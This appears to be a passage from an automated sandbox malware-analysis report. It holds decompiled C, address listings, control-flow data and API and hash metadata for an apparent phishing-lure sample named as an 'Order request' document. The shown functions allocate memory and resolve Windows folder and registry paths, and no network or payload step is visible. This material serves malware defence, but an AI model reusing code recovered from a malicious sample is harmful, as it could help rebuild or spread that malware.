					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}
































































                                                0x10001b20
                                                0x10001b23
                                                0x10001b26
                                                0x10001b29
                                                0x10001b2c
                                                0x10001b2f
                                                0x10001b32
                                                0x10001b34
                                                0x10001b37
                                                0x10001b3c
                                                0x10001b3f
                                                0x10001b47
                                                0x10001b4f
                                                0x10001b51
                                                0x10001b54
                                                0x10001b5c
                                                0x10001b5c
                                                0x10001b61
                                                0x10001b64
                                                0x00000000
                                                0x00000000
                                                0x10001b6e
                                                0x10001b71
                                                0x10001b76
                                                0x10001b78
                                                0x10001beb
                                                0x10001beb
                                                0x10001beb
                                                0x10001bef
                                                0x10001bf2
                                                0x10001bf4
                                                0x10001c16
                                                0x10001c18
                                                0x10001c1b
                                                0x10001c24
                                                0x10001c2a
                                                0x10001c2c
                                                0x10001c32
                                                0x10001c32
                                                0x10001c38
                                                0x10001c3b
                                                0x10001c3b
                                                0x10001c3e
                                                0x10001c3e
                                                0x10001c44
                                                0x10001c46
                                                0x10001c46
                                                0x10001c48
                                                0x10001c4b
                                                0x10001c4e
                                                0x10001c54
                                                0x10001c5a
                                                0x10001c5d
                                                0x10001c81
                                                0x10001c84
                                                0x00000000
                                                0x00000000
                                                0x10001c87
                                                0x10001c89
                                                0x10001c97
                                                0x10001c9a
                                                0x10001c9c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001c9e
                                                0x10001c9e
                                                0x10001c9e
                                                0x10001ca4
                                                0x10001ca6
                                                0x00000000
                                                0x00000000
                                                0x10001ca8
                                                0x10001caa
                                                0x10001cac
                                                0x10001cae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001cae
                                                0x10001cb0
                                                0x10001cb2
                                                0x10001cb4
                                                0x10001cb4
                                                0x10001cba
                                                0x10001cc0
                                                0x10001cc2
                                                0x10001cd6
                                                0x10001cd6
                                                0x10001cd8
                                                0x10001cc4
                                                0x10001cca
                                                0x10001ccd
                                                0x10001ccd
                                                0x00000000
                                                0x10001c5f
                                                0x10001c5f
                                                0x10001c5f
                                                0x10001c60
                                                0x10001c68
                                                0x10001c6c
                                                0x10001c72
                                                0x10001c76
                                                0x10001cde
                                                0x10001ce1
                                                0x10001ce5
                                                0x10001d70
                                                0x10001d74
                                                0x10001b59
                                                0x00000000
                                                0x10001b59
                                                0x00000000
                                                0x10001d74
                                                0x10001c62
                                                0x10001c62
                                                0x10001c63
                                                0x00000000
                                                0x00000000
                                                0x10001c65
                                                0x10001c66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001c66
                                                0x10001c5d
                                                0x10001bf7
                                                0x00000000
                                                0x00000000
                                                0x10001c00
                                                0x10001c03
                                                0x10001c10
                                                0x10001c10
                                                0x10001c05
                                                0x00000000
                                                0x10001c05
                                                0x10001b7a
                                                0x10001b7d
                                                0x10001bce
                                                0x10001bd1
                                                0x10001be3
                                                0x10001be3
                                                0x10001be6
                                                0x00000000
                                                0x10001be6
                                                0x10001bd3
                                                0x10001bd8
                                                0x00000000
                                                0x00000000
                                                0x10001bda
                                                0x10001bdd
                                                0x10001ced
                                                0x10001cf0
                                                0x10001cf0
                                                0x10001cf2
                                                0x10002048
                                                0x1000204b
                                                0x100020b2
                                                0x10001d60
                                                0x10001d63
                                                0x10001d66
                                                0x10001d69
                                                0x10001d69
                                                0x10001d6b
                                                0x10001d6c
                                                0x10001d6c
                                                0x10001d6d
                                                0x00000000
                                                0x10001d6d
                                                0x1000204d
                                                0x10002050
                                                0x10002057
                                                0x10002057
                                                0x1000205b
                                                0x1000206f
                                                0x1000206f
                                                0x10002072
                                                0x10002076
                                                0x100020be
                                                0x100020c1
                                                0x100020c5
                                                0x00000000
                                                0x100020c5
                                                0x10002078
                                                0x1000207c
                                                0x00000000
                                                0x00000000
                                                0x1000207e
                                                0x10002085
                                                0x10002085
                                                0x1000208b
                                                0x1000208e
                                                0x100020aa
                                                0x10002090
                                                0x10002099
                                                0x1000209c
                                                0x1000209c
                                                0x00000000
                                                0x1000208e
                                                0x1000205d
                                                0x10002060
                                                0x10002064
                                                0x00000000
                                                0x00000000
                                                0x10002066
                                                0x00000000
                                                0x10002066
                                                0x10002052
                                                0x10002055
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002055
                                                0x10001cf8
                                                0x10001cf8
                                                0x10001cf9
                                                0x10001e29
                                                0x10001e29
                                                0x10001e2e
                                                0x10001e31
                                                0x00000000
                                                0x00000000
                                                0x10001e3e
                                                0x00000000
                                                0x10001fe5
                                                0x10001fe8
                                                0x10001feb
                                                0x10001feb
                                                0x10001fec
                                                0x10001fed
                                                0x10001ff0
                                                0x10001ff3
                                                0x10001ff6
                                                0x00000000
                                                0x00000000
                                                0x10001ff8
                                                0x10001ff8
                                                0x10001ffc
                                                0x10002014
                                                0x10002017
                                                0x10002021
                                                0x00000000
                                                0x10002021
                                                0x10001ffe
                                                0x10001ffe
                                                0x10002001
                                                0x00000000
                                                0x00000000
                                                0x10002003
                                                0x10002006
                                                0x10002008
                                                0x10002009
                                                0x10002009
                                                0x10002009
                                                0x1000200a
                                                0x1000200d
                                                0x10002010
                                                0x10002011
                                                0x10001feb
                                                0x10001fec
                                                0x10001fed
                                                0x10001ff0
                                                0x10001ff3
                                                0x10001ff6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001ff6
                                                0x00000000
                                                0x10001e85
                                                0x00000000
                                                0x00000000
                                                0x10001e91
                                                0x00000000
                                                0x00000000
                                                0x10001e78
                                                0x10001e7c
                                                0x10001e80
                                                0x00000000
                                                0x00000000
                                                0x10001fb6
                                                0x10001fba
                                                0x00000000
                                                0x00000000
                                                0x10001fc0
                                                0x10001fc9
                                                0x10001fd0
                                                0x10001fd8
                                                0x00000000
                                                0x00000000
                                                0x10001f53
                                                0x10001f53
                                                0x00000000
                                                0x00000000
                                                0x10001e9a
                                                0x00000000
                                                0x00000000
                                                0x10002040
                                                0x00000000
                                                0x00000000
                                                0x10002030
                                                0x00000000
                                                0x00000000
                                                0x10002034
                                                0x00000000
                                                0x00000000
                                                0x1000203c
                                                0x00000000
                                                0x00000000
                                                0x10001f76
                                                0x00000000
                                                0x00000000
                                                0x10001f5b
                                                0x10001f5d
                                                0x00000000
                                                0x00000000
                                                0x10001f7e
                                                0x00000000
                                                0x00000000
                                                0x10001f63
                                                0x00000000
                                                0x00000000
                                                0x10001f67
                                                0x00000000
                                                0x00000000
                                                0x10002038
                                                0x10002042
                                                0x10002042
                                                0x00000000
                                                0x00000000
                                                0x10001f86
                                                0x10001f8a
                                                0x10001f8f
                                                0x10001f92
                                                0x10001f93
                                                0x10001f96
                                                0x10001f9c
                                                0x10001f9c
                                                0x00000000
                                                0x00000000
                                                0x10002028
                                                0x00000000
                                                0x00000000
                                                0x10001f6b
                                                0x10001f6e
                                                0x10001f70
                                                0x00000000
                                                0x00000000
                                                0x10001ea1
                                                0x10001ea1
                                                0x00000000
                                                0x00000000
                                                0x10001f7a
                                                0x10001f80
                                                0x10001f80
                                                0x10001ea3
                                                0x10001ea3
                                                0x10001ea6
                                                0x10001ead
                                                0x10001eb0
                                                0x10001eb2
                                                0x10001eb4
                                                0x10001eb5
                                                0x10001eb9
                                                0x10001ebc
                                                0x10001ec2
                                                0x10001ec8
                                                0x10001ec8
                                                0x10001eca
                                                0x10001eca
                                                0x10001ecd
                                                0x10001ed3
                                                0x10001ed5
                                                0x10001ed9
                                                0x10001ede
                                                0x10001ede
                                                0x10001ee0
                                                0x10001ee0
                                                0x10001ee3
                                                0x10001ee6
                                                0x10001eef
                                                0x10001ef5
                                                0x10001ef8
                                                0x10001ef8
                                                0x10001efa
                                                0x10001efd
                                                0x10001f03
                                                0x00000000
                                                0x10001f03
                                                0x10001ec4
                                                0x10001ec6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001e45
                                                0x10001e4b
                                                0x10001e4e
                                                0x10001e50
                                                0x10001e50
                                                0x10001e53
                                                0x10001e57
                                                0x10001e64
                                                0x10001e66
                                                0x10001e6c
                                                0x10001e6c
                                                0x10001e6c
                                                0x00000000
                                                0x00000000
                                                0x10001fa4
                                                0x10001fa8
                                                0x10001fad
                                                0x10001fb0
                                                0x10001f09
                                                0x10001f09
                                                0x10001f0b
                                                0x00000000
                                                0x00000000
                                                0x10001f11
                                                0x10001f11
                                                0x10001f15
                                                0x10001f1c
                                                0x10001f40
                                                0x10001f40
                                                0x10001f44
                                                0x10001f46
                                                0x10001f49
                                                0x10001f49
                                                0x10001f4c
                                                0x10001f4c
                                                0x00000000
                                                0x10001f44
                                                0x10001f21
                                                0x10001f24
                                                0x10001f24
                                                0x10001f2b
                                                0x10001f2d
                                                0x10001f30
                                                0x10001f37
                                                0x10001f38
                                                0x10001f3e
                                                0x10001f3e
                                                0x00000000
                                                0x10001f3e
                                                0x10001f32
                                                0x10001f35
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001e3e
                                                0x10001cff
                                                0x10001cff
                                                0x10001d00
                                                0x10001e26
                                                0x00000000
                                                0x10001e26
                                                0x10001d06
                                                0x10001d07
                                                0x00000000
                                                0x00000000
                                                0x10001d0f
                                                0x10001d0f
                                                0x10001d12
                                                0x10001d5d
                                                0x00000000
                                                0x10001d5d
                                                0x10001d14
                                                0x10001d14
                                                0x10001d17
                                                0x10001d41
                                                0x10001d44
                                                0x10001d47
                                                0x10001e18
                                                0x10001e18
                                                0x10001e18
                                                0x10001d4d
                                                0x10001d4d
                                                0x10001d4d
                                                0x10001e1e
                                                0x00000000
                                                0x10001e1e
                                                0x10001d1a
                                                0x10001d1a
                                                0x10001d1b
                                                0x10001d3e
                                                0x10001d40
                                                0x10001d40
                                                0x00000000
                                                0x10001d40
                                                0x10001d1d
                                                0x10001d1d
                                                0x10001d20
                                                0x10001d3a
                                                0x00000000
                                                0x10001d3a
                                                0x10001d22
                                                0x10001d22
                                                0x10001d25
                                                0x10001d36
                                                0x00000000
                                                0x10001d36
                                                0x10001d27
                                                0x10001d27
                                                0x10001d28
                                                0x10001d32
                                                0x00000000
                                                0x10001d32
                                                0x10001d2b
                                                0x10001d2c
                                                0x00000000
                                                0x00000000
                                                0x10001d2e
                                                0x00000000
                                                0x10001d2e
                                                0x00000000
                                                0x10001bdd
                                                0x10001b7f
                                                0x10001b82
                                                0x10001bb1
                                                0x10001bb5
                                                0x10001bbc
                                                0x10001bc3
                                                0x10001bc6
                                                0x10001bc9
                                                0x00000000
                                                0x10001bc9
                                                0x10001b84
                                                0x10001b85
                                                0x10001ba0
                                                0x10001ba7
                                                0x10001baa
                                                0x00000000
                                                0x10001baa
                                                0x10001b8a
                                                0x00000000
                                                0x10001b90
                                                0x10001b90
                                                0x10001b97
                                                0x00000000
                                                0x10001b97
                                                0x10001b8a
                                                0x10001d83
                                                0x10001d88
                                                0x10001d8d
                                                0x10001d91
                                                0x100021c5
                                                0x100021cb
                                                0x10001da3
                                                0x10001da5
                                                0x10001da6
                                                0x100020ee
                                                0x100020ee
                                                0x100020f1
                                                0x100020f4
                                                0x10002111
                                                0x10002117
                                                0x10002119
                                                0x1000211f
                                                0x10002136
                                                0x10002136
                                                0x10002136
                                                0x10002143
                                                0x10002149
                                                0x1000214c
                                                0x10002152
                                                0x10002154
                                                0x10002158
                                                0x1000215a
                                                0x10002161
                                                0x10002166
                                                0x10002169
                                                0x1000216b
                                                0x10002170
                                                0x10002182
                                                0x10002182
                                                0x10002170
                                                0x10002169
                                                0x10002158
                                                0x10002188
                                                0x1000218b
                                                0x10002195
                                                0x1000219d
                                                0x100021aa
                                                0x100021b0
                                                0x100021b3
                                                0x100020e3
                                                0x100020e3
                                                0x00000000
                                                0x100020e3
                                                0x100021b9
                                                0x100021bf
                                                0x100021bf
                                                0x00000000
                                                0x00000000
                                                0x100021c1
                                                0x100021c1
                                                0x100021c1
                                                0x100021c1
                                                0x00000000
                                                0x1000218d
                                                0x1000218d
                                                0x10002193
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002193
                                                0x1000218b
                                                0x10002122
                                                0x10002128
                                                0x1000212a
                                                0x10002130
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002130
                                                0x100020f6
                                                0x100020fd
                                                0x10002103
                                                0x10002109
                                                0x00000000
                                                0x10002109
                                                0x10001dac
                                                0x10001dad
                                                0x100020cd
                                                0x100020cd
                                                0x100020d3
                                                0x100020d6
                                                0x00000000
                                                0x00000000
                                                0x100020dd
                                                0x100020e2
                                                0x00000000
                                                0x100020e2
                                                0x10001db4
                                                0x00000000
                                                0x00000000
                                                0x10001dba
                                                0x10001dba
                                                0x10001dc3
                                                0x10001dc8
                                                0x10001dce
                                                0x00000000
                                                0x00000000
                                                0x10001dd4
                                                0x10001de1
                                                0x10001de7
                                                0x10001df1
                                                0x10001df7
                                                0x10001dff
                                                0x10001e0f
                                                0x00000000
                                                0x10001e0f

                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                • lstrcpyW.KERNEL32 ref: 10001C6C
                                                • lstrcpyW.KERNEL32 ref: 10001C76
                                                • GlobalFree.KERNEL32 ref: 10001C89
                                                • GlobalFree.KERNEL32 ref: 10001D83
                                                • GlobalFree.KERNEL32 ref: 10001D88
                                                • GlobalFree.KERNEL32 ref: 10001D8D
                                                • GlobalFree.KERNEL32 ref: 10001F38
                                                • lstrcpyW.KERNEL32 ref: 1000209C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc
                                                • String ID: N)w@h)w
                                                • API String ID: 4227406936-3621727588
                                                • Opcode ID: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                • Opcode Fuzzy Hash: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406054 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 746 406054-40605f 747 406061-406070 746->747 748 406072-406088 746->748 747->748 749 4062a0-4062a6 748->749 750 40608e-40609b 748->750 752 4062ac-4062b7 749->752 753 4060ad-4060ba 749->753 750->749 751 4060a1-4060a8 750->751 751->749 755 4062c2-4062c3 752->755 756 4062b9-4062bd call 406032 752->756 753->752 754 4060c0-4060cc 753->754 757 4060d2-40610e 754->757 758 40628d 754->758 756->755 760 406114-40611f GetVersion 757->760 761 40622e-406232 757->761 762 40629b-40629e 758->762 763 40628f-406299 758->763 764 406121-406125 760->764 765 406139 760->765 766 406234-406238 761->766 767 406267-40626b 761->767 762->749 763->749 764->765 770 406127-40612b 764->770 773 406140-406147 765->773 771 406248-406255 call 406032 766->771 772 40623a-406246 call 405f79 766->772 768 40627a-40628b lstrlenW 767->768 769 40626d-406275 call 406054 767->769 768->749 769->768 770->765 775 40612d-406131 770->775 784 40625a-406263 771->784 772->784 777 406149-40614b 773->777 778 40614c-40614e 773->778 775->765 780 406133-406137 775->780 777->778 782 406150-40616d call 405eff 778->782 783 40618a-40618d 778->783 780->773 789 406172-406176 782->789 785 40619d-4061a0 783->785 786 40618f-40619b GetSystemDirectoryW 783->786 784->768 788 406265 784->788 792 4061a2-4061b0 GetWindowsDirectoryW 785->792 793 40620b-40620d 785->793 791 40620f-406213 786->791 790 406226-40622c call 4062c6 788->790 794 406215-406219 789->794 795 40617c-406185 call 406054 789->795 790->768 791->790 791->794 792->793 793->791 796 4061b2-4061bc 793->796 794->790 799 40621b-406221 lstrcatW 794->799 795->791 801 4061d6-4061ec SHGetSpecialFolderLocation 796->801 802 4061be-4061c1 796->802 799->790 805 406207 801->805 806 4061ee-406205 SHGetPathFromIDListW CoTaskMemFree 801->806 802->801 804 4061c3-4061ca 802->804 807 4061d2-4061d4 804->807 805->793 806->791 806->805 807->791 807->801
                                                C-Code - Quality: 74%
                                                			E00406054(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr* _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t48;
				WCHAR* _t49;
				signed char _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				short _t66;
				short _t67;
				short _t69;
				short _t71;
				void* _t81;
				signed int _t85;
				intOrPtr* _t89;
				signed char _t90;
				intOrPtr _t93;
				void* _t98;
				void* _t108;
				short _t109;
				signed int _t112;
				void* _t113;
				WCHAR* _t114;
				void* _t116;

				_t113 = __esi;
				_t108 = __edi;
				_t81 = __ebx;
				_t48 = _a8;
				if(_t48 < 0) {
					_t93 =  *0x7a7a1c; // 0x8681a6
					_t48 =  *(_t93 - 4 + _t48 * 4);
				}
				_push(_t81);
				_push(_t113);
				_push(_t108);
				_t89 =  *0x7a8a78 + _t48 * 2;
				_t49 = 0x7a69e0;
				_t114 = 0x7a69e0;
				if(_a4 >= 0x7a69e0 && _a4 - 0x7a69e0 >> 1 < 0x800) {
					_t114 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t109 =  *_t89;
					if(_t109 == 0) {
						break;
					}
					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t98 = 2;
					_t89 = _t89 + _t98;
					__eflags = _t109 - 4;
					_v8 = _t89;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t114 = _t109;
							_t114 = _t114 + _t98;
							__eflags = _t114;
						} else {
							 *_t114 =  *_t89;
							_t114 = _t114 + _t98;
							_t89 = _t89 + _t98;
						}
						continue;
					}
					_t51 =  *((intOrPtr*)(_t89 + 1));
					_t90 =  *_t89;
					_v8 = _v8 + 2;
					_t85 = _t90 & 0x000000ff;
					_t52 = _t51 & 0x000000ff;
					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
					_v16 = _t52;
					_t53 = _t52 | 0x00008000;
					__eflags = _t109 - 2;
					_v24 = _t85;
					_v28 = _t85 | 0x00008000;
					_v20 = _t53;
					if(_t109 != 2) {
						__eflags = _t109 - 3;
						if(_t109 != 3) {
							__eflags = _t109 - 1;
							if(_t109 == 1) {
								__eflags = (_t53 | 0xffffffff) - _a8;
								E00406054(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
							}
							L42:
							_t54 = lstrlenW(_t114);
							_t89 = _v8;
							_t114 =  &(_t114[_t54]);
							_t49 = 0x7a69e0;
							continue;
						}
						__eflags = _a8 - 0x1d;
						if(_a8 != 0x1d) {
							__eflags = (_a8 << 0xb) + 0x7a9000;
							E00406032(_t114, (_a8 << 0xb) + 0x7a9000);
						} else {
							E00405F79(_t114,  *0x7a8a48);
						}
						__eflags = _a8 + 0xffffffeb - 7;
						if(_a8 + 0xffffffeb < 7) {
							L33:
							E004062C6(_t114);
						}
						goto L42;
					}
					_t112 = 2;
					_t66 = GetVersion();
					__eflags = _t66;
					if(_t66 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x7a8ac4;
						if( *0x7a8ac4 != 0) {
							_t112 = 4;
						}
						__eflags = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 == 0x24) {
									GetWindowsDirectoryW(_t114, 0x400);
									_t112 = 0;
								}
								while(1) {
									__eflags = _t112;
									if(_t112 == 0) {
										goto L30;
									}
									_t67 =  *0x7a8a44;
									_t112 = _t112 - 1;
									__eflags = _t67;
									if(_t67 == 0) {
										L26:
										_t69 = SHGetSpecialFolderLocation( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											L28:
											 *_t114 =  *_t114 & 0x00000000;
											__eflags =  *_t114;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t114);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t71 =  *_t67( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
									__eflags = _t71;
									if(_t71 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t114, 0x400);
							goto L30;
						} else {
							_t87 = _t85 & 0x0000003f;
							E00405EFF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
							__eflags =  *_t114;
							if( *_t114 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406054(_t87, _t112, _t114, _t114, _v16);
							L30:
							__eflags =  *_t114;
							if( *_t114 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t66 - 0x5a04;
					if(_t66 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t114 =  *_t114 & 0x00000000;
				if(_a4 == 0) {
					return _t49;
				}
				return E00406032(_a4, _t49);
			}































                                                0x00406054
                                                0x00406054
                                                0x00406054
                                                0x0040605a
                                                0x0040605f
                                                0x00406061
                                                0x00406070
                                                0x00406070
                                                0x00406078
                                                0x00406079
                                                0x0040607a
                                                0x0040607b
                                                0x0040607e
                                                0x00406086
                                                0x00406088
                                                0x004060a1
                                                0x004060a4
                                                0x004060a4
                                                0x004062a0
                                                0x004062a0
                                                0x004062a6
                                                0x00000000
                                                0x00000000
                                                0x004060b4
                                                0x004060ba
                                                0x00000000
                                                0x00000000
                                                0x004060c2
                                                0x004060c3
                                                0x004060c5
                                                0x004060c9
                                                0x004060cc
                                                0x0040628d
                                                0x0040629b
                                                0x0040629e
                                                0x0040629e
                                                0x0040628f
                                                0x00406292
                                                0x00406295
                                                0x00406297
                                                0x00406297
                                                0x00000000
                                                0x0040628d
                                                0x004060d2
                                                0x004060d5
                                                0x004060e4
                                                0x004060ea
                                                0x004060ed
                                                0x004060f0
                                                0x004060fa
                                                0x004060ff
                                                0x00406101
                                                0x00406105
                                                0x00406108
                                                0x0040610b
                                                0x0040610e
                                                0x0040622e
                                                0x00406232
                                                0x00406267
                                                0x0040626b
                                                0x00406270
                                                0x00406275
                                                0x00406275
                                                0x0040627a
                                                0x0040627b
                                                0x00406280
                                                0x00406283
                                                0x00406286
                                                0x00000000
                                                0x00406286
                                                0x00406234
                                                0x00406238
                                                0x0040624e
                                                0x00406255
                                                0x0040623a
                                                0x00406241
                                                0x00406241
                                                0x00406260
                                                0x00406263
                                                0x00406226
                                                0x00406227
                                                0x00406227
                                                0x00000000
                                                0x00406263
                                                0x00406116
                                                0x00406117
                                                0x0040611d
                                                0x0040611f
                                                0x00406139
                                                0x00406139
                                                0x00406140
                                                0x00406140
                                                0x00406147
                                                0x0040614b
                                                0x0040614b
                                                0x0040614c
                                                0x0040614e
                                                0x0040618a
                                                0x0040618d
                                                0x0040619d
                                                0x004061a0
                                                0x004061a8
                                                0x004061ae
                                                0x004061ae
                                                0x0040620b
                                                0x0040620b
                                                0x0040620d
                                                0x00000000
                                                0x00000000
                                                0x004061b2
                                                0x004061b9
                                                0x004061ba
                                                0x004061bc
                                                0x004061d6
                                                0x004061e4
                                                0x004061ea
                                                0x004061ec
                                                0x00406207
                                                0x00406207
                                                0x00406207
                                                0x00000000
                                                0x00406207
                                                0x004061f2
                                                0x004061fd
                                                0x00406203
                                                0x00406205
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406205
                                                0x004061be
                                                0x004061c1
                                                0x00000000
                                                0x00000000
                                                0x004061d0
                                                0x004061d2
                                                0x004061d4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061d4
                                                0x00000000
                                                0x0040620b
                                                0x00406195
                                                0x00000000
                                                0x00406150
                                                0x00406152
                                                0x0040616d
                                                0x00406172
                                                0x00406176
                                                0x00406215
                                                0x00406215
                                                0x00406219
                                                0x00406221
                                                0x00406221
                                                0x00000000
                                                0x00406219
                                                0x00406180
                                                0x0040620f
                                                0x0040620f
                                                0x00406213
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406213
                                                0x0040614e
                                                0x00406121
                                                0x00406125
                                                0x00000000
                                                0x00000000
                                                0x00406127
                                                0x0040612b
                                                0x00000000
                                                0x00000000
                                                0x0040612d
                                                0x00406131
                                                0x00000000
                                                0x00406133
                                                0x00406133
                                                0x00000000
                                                0x00406133
                                                0x00406131
                                                0x004062ac
                                                0x004062b7
                                                0x004062c3
                                                0x004062c3
                                                0x00000000

                                                APIs
                                                • GetVersion.KERNEL32(00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 00406117
                                                • GetSystemDirectoryW.KERNEL32(ExecToStack,00000400), ref: 00406195
                                                • GetWindowsDirectoryW.KERNEL32(ExecToStack,00000400), ref: 004061A8
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061E4
                                                • SHGetPathFromIDListW.SHELL32(?,ExecToStack), ref: 004061F2
                                                • CoTaskMemFree.OLE32(?), ref: 004061FD
                                                • lstrcatW.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 00406221
                                                • lstrlenW.KERNEL32(ExecToStack,00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 0040627B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: ExecToStack$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-4080303844
                                                • Opcode ID: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
                                                • Instruction ID: 54f449c5e60a038f814dd9badb8d8d01ca624a198295cd2e3a2f801cab414967
                                                • Opcode Fuzzy Hash: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
